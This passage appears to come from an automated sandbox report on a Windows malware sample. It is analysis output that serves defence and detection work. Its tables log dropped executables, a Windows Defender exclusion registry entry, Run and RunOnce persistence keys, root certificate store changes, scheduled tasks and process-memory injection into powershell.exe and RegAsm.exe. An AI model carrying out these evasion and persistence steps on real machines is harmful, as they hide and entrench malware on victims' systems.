N/A N/A C:\Users\Admin\Pictures\mBqwAQ7x1c2wgqXjsZvidhVR.exe N/A
N/A N/A C:\Users\Admin\Pictures\WqRErBJ2fgYIpOVkS9dklRTf.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe N/A
N/A N/A C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3C9NQ.tmp\fBw2KIeSuRIu2hvKQqV2OAj5.tmp N/A
N/A N/A C:\Users\Admin\Pictures\b6fB4c7vk8eZgnrKGqsaZDP8.exe N/A
N/A N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
N/A N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
N/A N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
N/A N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-66CBQ.tmp\_isetup\_setup64.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6f-e8204-190-c1f8e-2cd1775d4e82c\Xotofycidy.exe N/A
N/A N/A C:\Program Files\Microsoft Office\RHUHXGVWEU\lightcleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\assistant_installer.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DigitalPulse = "\"C:\\Users\\Admin\\AppData\\Roaming\\DigitalPulse\\DigitalPulseService.exe\" 5333:::clickId=:::srcId=" C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Common Files\\ZHewunehywi.exe\"" C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2120 set thread context of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\LightCleaner\is-TGLIN.tmp C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
File created C:\Program Files (x86)\Common Files\ZHewunehywi.exe.config C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A
File created C:\Program Files\Microsoft Office\RHUHXGVWEU\lightcleaner.exe.config C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\CircularProgressBar.dll C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File opened for modification C:\Program Files (x86)\LightCleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\Common Files\ZHewunehywi.exe C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A
File created C:\Program Files (x86)\LightCleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-L9PSD.tmp C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File created C:\Program Files\Microsoft Office\RHUHXGVWEU\lightcleaner.exe C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\LightCleaner.exe C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-4MV1A.tmp C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File opened for modification C:\Program Files (x86)\LightCleaner\VTRegScan.dll C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-L81PH.tmp C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-GM5NG.tmp C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = … C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = … C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = … C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7
b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = … C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = … C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\WqRErBJ2fgYIpOVkS9dklRTf.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2120 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2120 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2120 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2120 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2120 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2120 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2120 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2120 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2120 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2120 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
